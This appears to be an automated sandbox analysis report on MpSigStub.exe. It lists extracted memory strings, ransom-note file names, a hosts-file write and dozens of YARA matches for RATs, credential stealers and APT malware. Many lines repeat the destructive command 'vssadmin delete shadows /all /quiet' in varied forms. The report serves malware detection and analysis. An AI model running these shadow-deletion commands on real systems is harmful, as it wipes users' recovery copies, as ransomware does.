Source: MpSigStub.exe, 00000023.00000003.18426889733.0000015B1BBC7000.00000004.00000001.sdmp Binary or memory string: vssadmin Delete Shadows /all /quiet
Source: MpSigStub.exe, 00000023.00000003.18425885690.0000015B1BCD0000.00000004.00000001.sdmp Binary or memory string: /C vssadmin.exe delete shadows /all /quiet
Source: MpSigStub.exe, 00000023.00000003.18425885690.0000015B1BCD0000.00000004.00000001.sdmp Binary or memory string: /C vssadmin.exe delete shadows /all /quietx
Source: MpSigStub.exe, 00000023.00000003.18424989390.0000015B1C5AA000.00000004.00000001.sdmp Binary or memory string: vssadmin.exe delete shadows /all /Quiet
Source: MpSigStub.exe, 00000023.00000003.18346670516.0000015B1AC31000.00000004.00000001.sdmp Binary or memory string: vssadmin.exedeleteshadows/all/quiet
Source: MpSigStub.exe, 00000023.00000003.18346670516.0000015B1AC31000.00000004.00000001.sdmp Binary or memory string: %vssadmin.exedeleteshadows/all/quiet
Source: MpSigStub.exe, 00000023.00000003.18430078945.0000015B1C0AE000.00000004.00000001.sdmp Binary or memory string: cmd.exe /c vssadmin delete shadows /all /quiet
Source: MpSigStub.exe, 00000023.00000003.18430078945.0000015B1C0AE000.00000004.00000001.sdmp Binary or memory string: /c vssadmin.exe delete shadows /quiet /all
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp Binary or memory string: /C vssadmin Delete Shadows /Quiet /All
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp Binary or memory string: vssadmin delete shadows /All]
Source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp Binary or memory string: /c vssadmin.exe delete shadows /all /quiet]
Source: MpSigStub.exe, 00000023.00000003.18293985930.0000015B1C0F1000.00000004.00000001.sdmp Binary or memory string: Nvssadmin.exe delete shadows /all /quiet
Source: MpSigStub.exe, 00000023.00000003.18425422653.0000015B1C5EB000.00000004.00000001.sdmp Binary or memory string: */c vssadmin.exe Delete Shadows /All /Quiet
Source: MpSigStub.exe, 00000023.00000003.18320914162.0000015B1B65F000.00000004.00000001.sdmp Binary or memory string: vssadmindeleteshadows/all/quiet
Source: MpSigStub.exe, 00000023.00000003.18320914162.0000015B1B65F000.00000004.00000001.sdmp Binary or memory string: !vssadmindeleteshadows/all/quiet
Source: MpSigStub.exe, 00000023.00000003.18426294063.0000015B1BD11000.00000004.00000001.sdmp Binary or memory string: /c vssadmin.exe delete shadows
Source: MpSigStub.exe, 00000023.00000003.18428517155.0000015B1C06B000.00000004.00000001.sdmp Binary or memory string: Fvssadmin delete shadows /all /quiet
Source: MpSigStub.exe, 00000023.00000003.18428517155.0000015B1C06B000.00000004.00000001.sdmp Binary or memory string: #vssadmin delete shadows /all /quiet
Source: MpSigStub.exe, 00000023.00000003.18428517155.0000015B1C06B000.00000004.00000001.sdmp Binary or memory string: /c vssadmin delete shadows /all /quiet
Source: MpSigStub.exe, 00000023.00000003.18428517155.0000015B1C06B000.00000004.00000001.sdmp Binary or memory string: /c vssadmin delete shadows /all /quiet]
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp Binary or memory string: cmd /c vssadmin delete shadows /all /quiet
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp Binary or memory string: 6vssadmin.exe delete shadows
Source: MpSigStub.exe, 00000023.00000003.18432805737.0000015B1BA3B000.00000004.00000001.sdmp Binary or memory string: vssadmin delete shadows
Source: MpSigStub.exe, 00000023.00000003.18432805737.0000015B1BA3B000.00000004.00000001.sdmp Binary or memory string: 'vssadmin.exe delete shadows /all /quiet
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp Binary or memory string: vssadmin delete shadows /for=c: /all /quiet
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp Binary or memory string: vssadmin delete shadows /for=d: /all /quiet
Source: MpSigStub.exe, 00000023.00000003.18284892419.0000015B1AF67000.00000004.00000001.sdmp Binary or memory string: /C vssadmin delete shadows /all /quiet
Found string related to ransomware
Source: MpSigStub.exe, 00000023.00000003.18286213062.0000015B1A381000.00000004.00000001.sdmp Binary or memory string: &act=gettext&lang=
Source: MpSigStub.exe, 00000023.00000003.18286213062.0000015B1A381000.00000004.00000001.sdmp Binary or memory string: &encrypted=
Modifies the hosts file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File written: C:\Windows\System32\drivers\etc\hosts
May drop file containing decryption instructions (likely related to ransomware)
Source: MpSigStub.exe, 00000023.00000003.18432465628.0000015B1B9FA000.00000004.00000001.sdmp Binary or memory string: How to decrypt files.html
Source: MpSigStub.exe, 00000023.00000003.18433465792.0000015B1B723000.00000004.00000001.sdmp Binary or memory string: RESTORE_FILES.txt
Source: MpSigStub.exe, 00000023.00000003.18286213062.0000015B1A381000.00000004.00000001.sdmp Binary or memory string: HELP_instructions.html

System Summary:

Potential malicious icon found
Source: initial sample Icon embedded in PE file: bad icon match: 20047c7c70f0e004
Malicious sample detected (through community Yara rule)
Source: 35.3.MpSigStub.exe.15b1ad30826.62.raw.unpack, type: UNPACKEDPE Matched rule: Detects Fireball malware - file clearlog.dll Author: Florian Roth
Source: 35.3.MpSigStub.exe.15b1b9c89b2.43.raw.unpack, type: UNPACKEDPE Matched rule: Detects Derusbi Kernel Driver Author: Florian Roth
Source: 35.3.MpSigStub.exe.15b1a7d1391.177.raw.unpack, type: UNPACKEDPE Matched rule: Detects an executable encrypted with a 4 byte XOR (also used for Derusbi Trojan) Author: Florian Roth
Source: 35.3.MpSigStub.exe.15b1a7cea69.179.raw.unpack, type: UNPACKEDPE Matched rule: Detects an executable encrypted with a 4 byte XOR (also used for Derusbi Trojan) Author: Florian Roth
Source: 35.3.MpSigStub.exe.15b1bb541e6.101.raw.unpack, type: UNPACKEDPE Matched rule: Detects DNSpionage Karkoff malware Author: Florian Roth
Source: 35.3.MpSigStub.exe.15b1bb541e6.101.raw.unpack, type: UNPACKEDPE Matched rule: Hack Deep Panda - htran-exe Author: Florian Roth
Source: 35.3.MpSigStub.exe.15b1bb541e6.101.raw.unpack, type: UNPACKEDPE Matched rule: Detects APT41 malware POISONPLUG Author: Florian Roth
Source: 35.3.MpSigStub.exe.15b1bb541e6.101.raw.unpack, type: UNPACKEDPE Matched rule: Detects HOPLIGHT malware used by HiddenCobra APT group Author: Florian Roth
Source: 35.3.MpSigStub.exe.15b1c00879a.77.unpack, type: UNPACKEDPE Matched rule: Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT Author: USG
Source: 35.3.MpSigStub.exe.15b1c00879a.77.unpack, type: UNPACKEDPE Matched rule: Red Leaves C&C left in memory, use with Volatility / Rekall Author: David Cannings
Source: 35.3.MpSigStub.exe.15b1b09d292.197.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 35.3.MpSigStub.exe.15b1bc1013a.56.raw.unpack, type: UNPACKEDPE Matched rule: Detects Mini RAT malware Author: Florian Roth
Source: 35.3.MpSigStub.exe.15b1a7b2b8a.201.raw.unpack, type: UNPACKEDPE Matched rule: Detects OilRig malware Author: Eyal Sela
Source: 35.3.MpSigStub.exe.15b1a7b2b8a.201.raw.unpack, type: UNPACKEDPE Matched rule: Rule to detect Duqu 2.0 samples Author: unknown
Source: 35.3.MpSigStub.exe.15b1b09d292.124.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 35.3.MpSigStub.exe.15b1bc1013a.25.raw.unpack, type: UNPACKEDPE Matched rule: Detects Mini RAT malware Author: Florian Roth
Source: 35.3.MpSigStub.exe.15b1b352d6a.96.raw.unpack, type: UNPACKEDPE Matched rule: HackTool_MSIL_SharPersist_2 Author: FireEye
Source: 35.3.MpSigStub.exe.15b1c4ed472.82.raw.unpack, type: UNPACKEDPE Matched rule: Detects Pupy RAT Author: Florian Roth
Source: 35.3.MpSigStub.exe.15b1c4ed472.82.raw.unpack, type: UNPACKEDPE Matched rule: Detects Pupy backdoor Author: Florian Roth
Source: 35.3.MpSigStub.exe.15b1bb549ea.103.raw.unpack, type: UNPACKEDPE Matched rule: Detects DNSpionage Karkoff malware Author: Florian Roth
Source: 35.3.MpSigStub.exe.15b1bb549ea.103.raw.unpack, type: UNPACKEDPE Matched rule: Hack Deep Panda - htran-exe Author: Florian Roth
Source: 35.3.MpSigStub.exe.15b1bb549ea.103.raw.unpack, type: UNPACKEDPE Matched rule: Detects APT41 malware POISONPLUG Author: Florian Roth
Source: 35.3.MpSigStub.exe.15b1bb549ea.103.raw.unpack, type: UNPACKEDPE Matched rule: Detects HOPLIGHT malware used by HiddenCobra APT group Author: Florian Roth
Source: 35.3.MpSigStub.exe.15b1bcea0d6.57.raw.unpack, type: UNPACKEDPE Matched rule: Identifies GoRat malware in memory based on strings. Author: FireEye
Source: 35.3.MpSigStub.exe.15b1bcea0d6.51.raw.unpack, type: UNPACKEDPE Matched rule: Identifies GoRat malware in memory based on strings. Author: FireEye
Source: 35.3.MpSigStub.exe.15b1b9ca5ba.42.raw.unpack, type: UNPACKEDPE Matched rule: Detects Derusbi Kernel Driver Author: Florian Roth
Source: 35.3.MpSigStub.exe.15b1c47d182.111.raw.unpack, type: UNPACKEDPE Matched rule: Detects Mimikatz strings Author: Florian Roth
Source: 35.3.MpSigStub.exe.15b1aab7177.152.unpack, type: UNPACKEDPE Matched rule: korlia Author: Nick Hoffman
Source: 35.3.MpSigStub.exe.15b1b013bb2.54.unpack, type: UNPACKEDPE Matched rule: Detects destructive malware Author: Florian Roth
Source: 35.3.MpSigStub.exe.15b1a7b1586.200.raw.unpack, type: UNPACKEDPE Matched rule: Detects OilRig malware Author: Eyal Sela
Source: 35.3.MpSigStub.exe.15b1a7b1586.200.raw.unpack, type: UNPACKEDPE Matched rule: Rule to detect Duqu 2.0 samples Author: unknown
Source: 35.3.MpSigStub.exe.15b1ad1f44c.63.raw.unpack, type: UNPACKEDPE Matched rule: Detects Fireball malware - file clearlog.dll Author: Florian Roth
Source: 35.3.MpSigStub.exe.15b1b9c97b6.41.raw.unpack, type: UNPACKEDPE Matched rule: Detects Derusbi Kernel Driver Author: Florian Roth
Source: 35.3.MpSigStub.exe.15b1bbe6ede.15.unpack, type: UNPACKEDPE Matched rule: Detects Mini RAT malware Author: Florian Roth
Source: 35.3.MpSigStub.exe.15b1bbe6ede.15.unpack, type: UNPACKEDPE Matched rule: XOR loops from Sakula malware Author: David Cannings
Source: 35.3.MpSigStub.exe.15b1bbe6ede.15.unpack, type: UNPACKEDPE Matched rule: The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project. Author: FireEye
Source: 35.3.MpSigStub.exe.15b1a7cfabd.178.raw.unpack, type: UNPACKEDPE Matched rule: Detects an executable encrypted with a 4 byte XOR (also used for Derusbi Trojan) Author: Florian Roth
Source: 35.3.MpSigStub.exe.15b1af1836e.68.unpack, type: UNPACKEDPE Matched rule: Detects OilRig malware Author: Eyal Sela (slightly modified by Florian Roth)
Source: 35.3.MpSigStub.exe.15b1bcea0d6.215.raw.unpack, type: UNPACKEDPE Matched rule: Identifies GoRat malware in memory based on strings. Author: FireEye
Source: 35.3.MpSigStub.exe.15b1c47e986.110.raw.unpack, type: UNPACKEDPE Matched rule: Detects Mimikatz strings Author: Florian Roth
Source: 35.3.MpSigStub.exe.15b1b2d20ac.231.raw.unpack, type: UNPACKEDPE Matched rule: Detects Gh0st RAT mentioned in Cylance' Ghost Dragon Report Author: Florian Roth
Source: 35.3.MpSigStub.exe.15b1abe8b36.144.unpack, type: UNPACKEDPE Matched rule: dump_tool Author: @patrickrolsen
Source: 35.3.MpSigStub.exe.15b1aab4af5.151.unpack, type: UNPACKEDPE Matched rule: korlia Author: Nick Hoffman
Source: 35.3.MpSigStub.exe.15b1b354b6e.95.raw.unpack, type: UNPACKEDPE Matched rule: HackTool_MSIL_SharPersist_2 Author: FireEye
Source: 35.3.MpSigStub.exe.15b1bb551ee.102.raw.unpack, type: UNPACKEDPE Matched rule: Detects DNSpionage Karkoff malware Author: Florian Roth
Source: 35.3.MpSigStub.exe.15b1bb551ee.102.raw.unpack, type: UNPACKEDPE Matched rule: Hack Deep Panda - htran-exe Author: Florian Roth
Source: 35.3.MpSigStub.exe.15b1bb551ee.102.raw.unpack, type: UNPACKEDPE Matched rule: Detects APT41 malware POISONPLUG Author: Florian Roth
Source: 35.3.MpSigStub.exe.15b1bb551ee.102.raw.unpack, type: UNPACKEDPE Matched rule: Detects HOPLIGHT malware used by HiddenCobra APT group Author: Florian Roth
Source: 35.3.MpSigStub.exe.15b1b4cce16.210.unpack, type: UNPACKEDPE Matched rule: LogKext is an open source keylogger for Mac OS X, a product of FSB software. Author: @mimeframe
Source: 35.3.MpSigStub.exe.15b1b4cce16.210.unpack, type: UNPACKEDPE Matched rule: Detects Mimikatz strings Author: Florian Roth
Source: 35.3.MpSigStub.exe.15b1b887722.80.unpack, type: UNPACKEDPE Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 35.3.MpSigStub.exe.15b1b887722.80.unpack, type: UNPACKEDPE Matched rule: Detects ISMDoor Backdoor Author: Florian Roth
Source: 35.3.MpSigStub.exe.15b1b4cce16.61.unpack, type: UNPACKEDPE Matched rule: LogKext is an open source keylogger for Mac OS X, a product of FSB software. Author: @mimeframe
Source: 35.3.MpSigStub.exe.15b1b4cce16.61.unpack, type: UNPACKEDPE Matched rule: Detects Mimikatz strings Author: Florian Roth
Source: 35.3.MpSigStub.exe.15b1b4cce16.92.unpack, type: UNPACKEDPE Matched rule: LogKext is an open source keylogger for Mac OS X, a product of FSB software. Author: @mimeframe
Source: 35.3.MpSigStub.exe.15b1b4cce16.92.unpack, type: UNPACKEDPE Matched rule: Detects Mimikatz strings Author: Florian Roth
Source: 35.3.MpSigStub.exe.15b1bbe6ede.24.unpack, type: UNPACKEDPE Matched rule: Detects Mini RAT malware Author: Florian Roth
Source: 35.3.MpSigStub.exe.15b1bbe6ede.24.unpack, type: UNPACKEDPE Matched rule: XOR loops from Sakula malware Author: David Cannings
Source: 35.3.MpSigStub.exe.15b1bbe6ede.24.unpack, type: UNPACKEDPE Matched rule: The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project. Author: FireEye
Source: 35.3.MpSigStub.exe.15b1bb8fa9d.13.unpack, type: UNPACKEDPE Matched rule: Detects Mini RAT malware Author: Florian Roth
Source: 35.3.MpSigStub.exe.15b1bb8fa9d.13.unpack, type: UNPACKEDPE Matched rule: XOR loops from Sakula malware Author: David Cannings
Source: 35.3.MpSigStub.exe.15b1bb8fa9d.13.unpack, type: UNPACKEDPE Matched rule: The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project. Author: FireEye
Source: 35.3.MpSigStub.exe.15b1bb8fa9d.13.unpack, type: UNPACKEDPE Matched rule: Mirage Identifying Strings Author: Seth Hardy
Source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE Matched rule: Detects Mini RAT malware Author: Florian Roth
Source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE Matched rule: Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT Author: USG
Source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE Matched rule: Detects a ZxShell - CN threat group Author: Florian Roth
Source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE Matched rule: XOR loops from Sakula malware Author: David Cannings
Source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE Matched rule: Detects Mimikatz strings Author: Florian Roth
Source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE Matched rule: APT_Backdoor_Win_GORAT_5 Author: FireEye
Source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE Matched rule: Identifies GoRat malware in memory based on strings. Author: FireEye
Source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE Matched rule: The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project. Author: FireEye
Source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE Matched rule: Detects ROKRAT malware Author: Florian Roth
Source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE Matched rule: Webshells Auto-generated - file vanquish.exe Author: Yara Bulk Rule Generator by Florian Roth
Source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE Matched rule: Red Leaves C&C left in memory, use with Volatility / Rekall Author: David Cannings
Source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE Matched rule: gh0st Author: https://github.com/jackcr/
Source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE Matched rule: Metasploit Payloads - file msf-psh.vba Author: Florian Roth
Source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE Matched rule: Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT Author: USG
Source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE Matched rule: Detects Pupy RAT Author: Florian Roth
Source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE Matched rule: Detects Arid Viper malware sample Author: Florian Roth
Source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE Matched rule: Detects Pupy backdoor Author: Florian Roth
Source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE Matched rule: Detects Mimikatz strings Author: Florian Roth
Source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE Matched rule: APT_Backdoor_Win_GORAT_5 Author: FireEye
Source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE Matched rule: CredTheft_MSIL_ADPassHunt_2 Author: FireEye
Source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE Matched rule: Detects ROKRAT malware Author: Florian Roth
Source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE Matched rule: Webshells Auto-generated - file vanquish.exe Author: Yara Bulk Rule Generator by Florian Roth
Source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE Matched rule: Red Leaves C&C left in memory, use with Volatility / Rekall Author: David Cannings
Source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE Matched rule: PoisonIvy_3 Author: Kevin Breen <kevin@techanarchy.net>
Source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE Matched rule: Detects Mini RAT malware Author: Florian Roth
Source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE Matched rule: Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT Author: USG
Source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE Matched rule: Detects a ZxShell - CN threat group Author: Florian Roth
Source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE Matched rule: XOR loops from Sakula malware Author: David Cannings
Source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE Matched rule: Detects Mimikatz strings Author: Florian Roth
Source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE Matched rule: APT_Backdoor_Win_GORAT_5 Author: FireEye
Source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE Matched rule: Identifies GoRat malware in memory based on strings. Author: FireEye
Source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE Matched rule: The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project. Author: FireEye
Source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE Matched rule: Detects ROKRAT malware Author: Florian Roth
Source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE Matched rule: Webshells Auto-generated - file vanquish.exe Author: Yara Bulk Rule Generator by Florian Roth
Source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE Matched rule: Red Leaves C&C left in memory, use with Volatility / Rekall Author: David Cannings
Source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE Matched rule: gh0st Author: https://github.com/jackcr/
Source: 00000023.00000003.18298177384.0000015B1AD15000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects Fireball malware - file clearlog.dll Author: Florian Roth
Source: 00000023.00000003.18299696915.0000015B1AF24000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects OilRig malware Author: Eyal Sela (slightly modified by Florian Roth)
Source: 00000023.00000003.18293662919.0000015B1BCD0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Identifies GoRat malware in memory based on strings. Author: FireEye
Source: 00000023.00000003.18314163408.0000015B1BB45000.00000004.00000001.sdmp, type: MEMORY Matched rule: Keylogger component Author: Microsoft
Source: 00000023.00000003.18314163408.0000015B1BB45000.00000004.00000001.sdmp, type: MEMORY Matched rule: Hack Deep Panda - htran-exe Author: Florian Roth
Source: 00000023.00000003.18339366931.0000015B1C174000.00000004.00000001.sdmp, type: MEMORY Matched rule: CredTheft_MSIL_ADPassHunt_2 Author: FireEye
Source: 00000023.00000003.18425885690.0000015B1BCD0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
Source: 00000023.00000003.18425885690.0000015B1BCD0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects unspecified malware sample Author: Florian Roth
Source: 00000023.00000003.18426889733.0000015B1BBC7000.00000004.00000001.sdmp, type: MEMORY Matched rule: Mirage Identifying Strings Author: Seth Hardy
Source: 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects Pupy backdoor Author: Florian Roth
Source: 00000023.00000003.18318671001.0000015B1C4A2000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[... Author: FR/ANSSI/SDO
Source: 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects OilRig malware Author: Eyal Sela
Source: 00000023.00000003.18434111043.0000015B1AF23000.00000004.00000001.sdmp, type: MEMORY Matched rule: Xtrem RAT v3.5 Author: Jean-Philippe Teissier / @Jipe_
Source: 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT Author: USG
Source: 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp, type: MEMORY Matched rule: Red Leaves C&C left in memory, use with Volatility / Rekall Author: David Cannings
Source: 00000023.00000003.18431805767.0000015B1BFA6000.00000004.00000001.sdmp, type: MEMORY Matched rule: Webshells Auto-generated - file vanquish.exe Author: Yara Bulk Rule Generator by Florian Roth
Source: 00000023.00000003.18305343223.0000015B1C4E5000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects Pupy backdoor Author: Florian Roth
Source: 00000023.00000003.18341085023.0000015B1C4A2000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[... Author: FR/ANSSI/SDO
Source: 00000023.00000003.18427196191.0000015B1AB46000.00000004.00000001.sdmp, type: MEMORY Matched rule: korlia Author: Nick Hoffman
Source: 00000023.00000003.18332888598.0000015B1C174000.00000004.00000001.sdmp, type: MEMORY Matched rule: CredTheft_MSIL_ADPassHunt_2 Author: FireEye
Source: 00000023.00000003.18430797596.0000015B1AE5D000.00000004.00000001.sdmp, type: MEMORY Matched rule: PoisonIvy_3 Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000023.00000003.18297289690.0000015B1BCD0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Identifies GoRat malware in memory based on strings. Author: FireEye
Source: 00000023.00000003.18316647369.0000015B1B557000.00000004.00000001.sdmp, type: MEMORY Matched rule: LogKext is an open source keylogger for Mac OS X, a product of FSB software. Author: @mimeframe
Source: 00000023.00000003.18302210268.0000015B1AF24000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects OilRig malware Author: Eyal Sela (slightly modified by Florian Roth)
Source: 00000023.00000003.18317322207.0000015B1B5DB000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects a ZxShell - CN threat group Author: Florian Roth
Source: 00000023.00000003.18285687047.0000015B1B29A000.00000004.00000001.sdmp, type: MEMORY Matched rule: CVE_2018_4878_0day_ITW Author: unknown
Source: 00000023.00000003.18426294063.0000015B1BD11000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects a ZxShell - CN threat group Author: Florian Roth
Source: 00000023.00000003.18426294063.0000015B1BD11000.00000004.00000001.sdmp, type: MEMORY Matched rule: gh0st Author: https://github.com/jackcr/
Source: 00000023.00000003.18309001390.0000015B1AF24000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects OilRig malware Author: Eyal Sela (slightly modified by Florian Roth)
Source: 00000023.00000003.18340030081.0000015B1AB4D000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects Tofu Trojan Author: Cylance
Source: 00000023.00000003.18327176542.0000015B1B61C000.00000004.00000001.sdmp, type: MEMORY Matched rule: Xtrem RAT v3.5 Author: Jean-Philippe Teissier / @Jipe_
Source: 00000023.00000003.18428865493.0000015B1A381000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects Pupy backdoor Author: Florian Roth
Source: 00000023.00000003.18282376211.0000015B1C133000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects Crypto Miner strings Author: Florian Roth
Source: 00000023.00000003.18351572125.0000015B1C174000.00000004.00000001.sdmp, type: MEMORY Matched rule: CredTheft_MSIL_ADPassHunt_2 Author: FireEye
Source: 00000023.00000003.18282718286.0000015B1C174000.00000004.00000001.sdmp, type: MEMORY Matched rule: CredTheft_MSIL_ADPassHunt_2 Author: FireEye
Source: 00000023.00000003.18317647190.0000015B1B61C000.00000004.00000001.sdmp, type: MEMORY Matched rule: Xtrem RAT v3.5 Author: Jean-Philippe Teissier / @Jipe_
Source: 00000023.00000003.18351179947.0000015B1BCD0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Identifies GoRat malware in memory based on strings. Author: FireEye
Source: 00000023.00000003.18423819335.0000015B1B1FA000.00000004.00000001.sdmp, type: MEMORY Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Source: 00000023.00000003.18294299849.0000015B1C174000.00000004.00000001.sdmp, type: MEMORY Matched rule: CredTheft_MSIL_ADPassHunt_2 Author: FireEye
Source: 00000023.00000003.18313512818.0000015B1B346000.00000004.00000001.sdmp, type: MEMORY Matched rule: HackTool_MSIL_SharPersist_2 Author: FireEye
Source: 00000023.00000003.18306868118.0000015B1AA1D000.00000004.00000001.sdmp, type: MEMORY Matched rule: APT_DeputyDog_Fexel Author: ThreatConnect Intelligence Research Team
Source: 00000023.00000003.18344475813.0000015B1C1D6000.00000004.00000001.sdmp, type: MEMORY Matched rule: Metasploit Payloads - file msf-psh.vba Author: Florian Roth
Source: 00000023.00000003.18427547415.0000015B1B8F2000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects export from Gold Dragon - February 2018 Author: Florian Roth
Source: 00000023.00000003.18284892419.0000015B1AF67000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
Source: 00000023.00000003.18318342429.0000015B1C460000.00000004.00000001.sdmp, type: MEMORY Matched rule: APT_DeputyDog_Fexel Author: ThreatConnect Intelligence Research Team
Source: 00000023.00000003.18431461093.0000015B1B02B000.00000004.00000001.sdmp, type: MEMORY Matched rule: 9002 Identifying Strings Author: Seth Hardy
Source: 00000023.00000003.18346153630.0000015B1AB4D000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects Tofu Trojan Author: Cylance
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: LogKext is an open source keylogger for Mac OS X, a product of FSB software. Author: @mimeframe
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: Metasploit Payloads - file msf-psh.vba Author: Florian Roth
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: Detects Tofu Trojan Author: Cylance
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: Keylogger - generic rule for a Chinese variant Author: Florian Roth
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: Detects a ZxShell - CN threat group Author: Florian Roth
